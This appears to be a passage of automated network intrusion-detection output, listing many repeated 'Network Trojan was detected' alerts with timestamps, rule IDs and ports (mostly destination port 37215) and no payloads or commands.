                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593946
                  SID:2835222
                  Source Port:54182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.888370
                  SID:2835222
                  Source Port:55618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536080
                  SID:2829579
                  Source Port:53404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649418
                  SID:2835222
                  Source Port:46418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788952
                  SID:2835222
                  Source Port:39738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908522
                  SID:2835222
                  Source Port:56918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316335
                  SID:2835222
                  Source Port:53836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628371
                  SID:2829579
                  Source Port:34330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800656
                  SID:2835222
                  Source Port:42696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276808
                  SID:2835222
                  Source Port:57776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.918874
                  SID:2835222
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.865419
                  SID:2829579
                  Source Port:46830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628313
                  SID:2835222
                  Source Port:35452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585516
                  SID:2835222
                  Source Port:55518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885404
                  SID:2835222
                  Source Port:58536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.801749
                  SID:2829579
                  Source Port:59622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872196
                  SID:2835222
                  Source Port:51782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904733
                  SID:2835222
                  Source Port:40780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547422
                  SID:2829579
                  Source Port:59024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.909319
                  SID:2835222
                  Source Port:58408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494984
                  SID:2829579
                  Source Port:37140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590429
                  SID:2829579
                  Source Port:33022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889469
                  SID:2829579
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276843
                  SID:2835222
                  Source Port:54630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846726
                  SID:2829579
                  Source Port:43928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608543
                  SID:2829579
                  Source Port:50808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927227
                  SID:2829579
                  Source Port:42922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766209
                  SID:2829579
                  Source Port:54464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719427
                  SID:2829579
                  Source Port:56470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801665
                  SID:2829579
                  Source Port:47366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738141
                  SID:2829579
                  Source Port:51848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547628
                  SID:2829579
                  Source Port:44638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796877
                  SID:2829579
                  Source Port:37452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546769
                  SID:2835222
                  Source Port:41820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742257
                  SID:2829579
                  Source Port:49384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586914
                  SID:2835222
                  Source Port:49416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719045
                  SID:2835222
                  Source Port:47918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788087
                  SID:2835222
                  Source Port:37502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657758
                  SID:2829579
                  Source Port:56488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720693
                  SID:2835222
                  Source Port:35058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601717
                  SID:2835222
                  Source Port:40436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796800
                  SID:2835222
                  Source Port:50542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610879
                  SID:2829579
                  Source Port:58594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.817777
                  SID:2835222
                  Source Port:59796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576902
                  SID:2835222
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655664
                  SID:2829579
                  Source Port:48742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.848846
                  SID:2829579
                  Source Port:46898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555561
                  SID:2829579
                  Source Port:41306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563486
                  SID:2829579
                  Source Port:60336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627725
                  SID:2835222
                  Source Port:45754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718944
                  SID:2835222
                  Source Port:50652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737794
                  SID:2829579
                  Source Port:58596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279388
                  SID:2829579
                  Source Port:56780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665349
                  SID:2835222
                  Source Port:54364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845022
                  SID:2835222
                  Source Port:41360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798193
                  SID:2835222
                  Source Port:36972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906168
                  SID:2829579
                  Source Port:48188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316588
                  SID:2835222
                  Source Port:34052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845200
                  SID:2835222
                  Source Port:36408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911213
                  SID:2835222
                  Source Port:49976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537474
                  SID:2829579
                  Source Port:55974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489409
                  SID:2835222
                  Source Port:49210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276872
                  SID:2835222
                  Source Port:36506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627931
                  SID:2835222
                  Source Port:38620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276274
                  SID:2829579
                  Source Port:35884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661259
                  SID:2829579
                  Source Port:48278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766599
                  SID:2835222
                  Source Port:48628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887264
                  SID:2829579
                  Source Port:56244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493445
                  SID:2829579
                  Source Port:58342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542774
                  SID:2829579
                  Source Port:52066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794518
                  SID:2829579
                  Source Port:39182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769826
                  SID:2835222
                  Source Port:52948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490348
                  SID:2835222
                  Source Port:49302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529947
                  SID:2829579
                  Source Port:45556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857886
                  SID:2835222
                  Source Port:47678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543501
                  SID:2829579
                  Source Port:56402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530516
                  SID:2835222
                  Source Port:45402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887432
                  SID:2835222
                  Source Port:52122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546842
                  SID:2829579
                  Source Port:56124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576155
                  SID:2835222
                  Source Port:36612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577736
                  SID:2835222
                  Source Port:57028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678595
                  SID:2829579
                  Source Port:37240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537474
                  SID:2829579
                  Source Port:36740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.919971
                  SID:2835222
                  Source Port:42250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489941
                  SID:2835222
                  Source Port:35704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661273
                  SID:2829579
                  Source Port:36226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315497
                  SID:2835222
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800742
                  SID:2829579
                  Source Port:51588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702953
                  SID:2829579
                  Source Port:32958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277368
                  SID:2835222
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775767
                  SID:2829579
                  Source Port:57870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.889469
                  SID:2829579
                  Source Port:58826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527347
                  SID:2829579
                  Source Port:42484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931591
                  SID:2835222
                  Source Port:50396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.347210
                  SID:2030490
                  Source Port:58198
                  Destination Port:19990
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649378
                  SID:2835222
                  Source Port:42790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790237
                  SID:2829579
                  Source Port:57914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797191
                  SID:2829579
                  Source Port:47726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907517
                  SID:2829579
                  Source Port:51012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661344
                  SID:2829579
                  Source Port:33874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790301
                  SID:2835222
                  Source Port:38500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598243
                  SID:2829579
                  Source Port:58614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780796
                  SID:2835222
                  Source Port:33060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489745
                  SID:2829579
                  Source Port:38116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843844
                  SID:2829579
                  Source Port:41968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.792169
                  SID:2835222
                  Source Port:58528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.884886
                  SID:2829579
                  Source Port:44366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791255
                  SID:2829579
                  Source Port:54098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276872
                  SID:2829579
                  Source Port:36506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315440
                  SID:2835222
                  Source Port:44474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528268
                  SID:2829579
                  Source Port:44880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587422
                  SID:2835222
                  Source Port:60320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529115
                  SID:2835222
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907487
                  SID:2829579
                  Source Port:44306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490393
                  SID:2835222
                  Source Port:57230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577609
                  SID:2829579
                  Source Port:52226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490034
                  SID:2829579
                  Source Port:40250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601990
                  SID:2829579
                  Source Port:50394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791644
                  SID:2835222
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720296
                  SID:2835222
                  Source Port:33070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483039
                  SID:2829579
                  Source Port:36708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.595369
                  SID:2835222
                  Source Port:58598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788958
                  SID:2829579
                  Source Port:34126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545267
                  SID:2835222
                  Source Port:34642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793312
                  SID:2829579
                  Source Port:51990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770870
                  SID:2835222
                  Source Port:36934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927378
                  SID:2835222
                  Source Port:50942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742341
                  SID:2835222
                  Source Port:36182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912830
                  SID:2829579
                  Source Port:43830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493389
                  SID:2835222
                  Source Port:44170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737910
                  SID:2829579
                  Source Port:42942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809993
                  SID:2835222
                  Source Port:52784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849076
                  SID:2829579
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695118
                  SID:2835222
                  Source Port:35118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491903
                  SID:2829579
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.353814
                  SID:2835222
                  Source Port:33206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696405
                  SID:2835222
                  Source Port:49754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494768
                  SID:2835222
                  Source Port:33812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.878363
                  SID:2829579
                  Source Port:45304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907966
                  SID:2829579
                  Source Port:34182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578625
                  SID:2835222
                  Source Port:47772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604412
                  SID:2835222
                  Source Port:55292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887630
                  SID:2829579
                  Source Port:50786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588368
                  SID:2829579
                  Source Port:57568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742652
                  SID:2835222
                  Source Port:41316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845085
                  SID:2829579
                  Source Port:51580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911178
                  SID:2835222
                  Source Port:37826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.487865
                  SID:2829579
                  Source Port:34496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591419
                  SID:2835222
                  Source Port:39244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.703064
                  SID:2829579
                  Source Port:37682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768766
                  SID:2829579
                  Source Port:33316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649329
                  SID:2835222
                  Source Port:50756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846645
                  SID:2829579
                  Source Port:47516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682925
                  SID:2829579
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319593
                  SID:2835222
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583541
                  SID:2835222
                  Source Port:59928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695667
                  SID:2835222
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628153
                  SID:2829579
                  Source Port:52564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277647
                  SID:2835222
                  Source Port:46220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810003
                  SID:2835222
                  Source Port:38292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742808
                  SID:2835222
                  Source Port:48302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312588
                  SID:2835222
                  Source Port:36580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661291
                  SID:2829579
                  Source Port:38236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887287
                  SID:2829579
                  Source Port:60790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622269
                  SID:2835222
                  Source Port:48718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769375
                  SID:2835222
                  Source Port:41680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910437
                  SID:2829579
                  Source Port:34924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584425
                  SID:2835222
                  Source Port:52198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652043
                  SID:2829579
                  Source Port:47122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528234
                  SID:2829579
                  Source Port:36062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283826
                  SID:2835222
                  Source Port:34892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323478
                  SID:2835222
                  Source Port:56370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660948
                  SID:2829579
                  Source Port:37802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910454
                  SID:2829579
                  Source Port:52388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628294
                  SID:2829579
                  Source Port:44316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278727
                  SID:2835222
                  Source Port:37242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312563
                  SID:2829579
                  Source Port:53944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601730
                  SID:2835222
                  Source Port:55284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907860
                  SID:2829579
                  Source Port:57268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583606
                  SID:2835222
                  Source Port:42508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536732
                  SID:2829579
                  Source Port:55818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768634
                  SID:2829579
                  Source Port:58012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780933
                  SID:2829579
                  Source Port:50570
                  Destination Port:37215
